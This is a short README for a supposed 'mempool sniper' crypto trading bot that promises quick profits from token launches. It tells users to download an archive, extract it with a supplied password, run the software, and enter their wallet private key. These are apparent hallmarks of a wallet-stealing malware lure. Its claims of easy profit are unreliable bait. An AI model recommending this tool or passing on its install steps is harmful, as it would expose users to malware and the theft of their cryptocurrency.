This is a cryptocurrency trading bot that uses mempool analysis to make trades. Sniper bot allows you to be one of the first buys on any token launch. On a token launch there is an initial pump of the price. Buying first and selling at the first peak can make you fast profits. Its an a public version.
- Mempool monitoring for liquidity add transactions, Pinksale and DXsale signals
- Works with Uniswap-V3 like AMMs in most common EVM networks (Uniswap, Pancackeswap, Sushiswap, Quickswap, TraderJoe and etc.)
- Automatic sell based on a user configured profit
- Honeypot detection
- Telegram bot notifications
To install the bot, follow these steps:
- Download repo and extract files with password
memp00l
- Move into the directory and launch software
To use the bot, check out settings:
- Setup your account
address
andprivate key
(not seed) - Setup you
node url
(Quicknode or Moralis) - Add
smart contract address
of token you wish to buy - Define minimum amount of liquidity that should be added to the token before the buy should start
- Set amount of BNB to invest and slippage, gas limit will be configured automatically
- Enable mempool detection for listening transactions in mempool
- Start the bot
The mempool-trading-bot
is a tool that is provided as-is and with no warranties. The usage of this tool is entirely at your own risk.
This project is licensed under the MIT License. See the LICENSE file for details.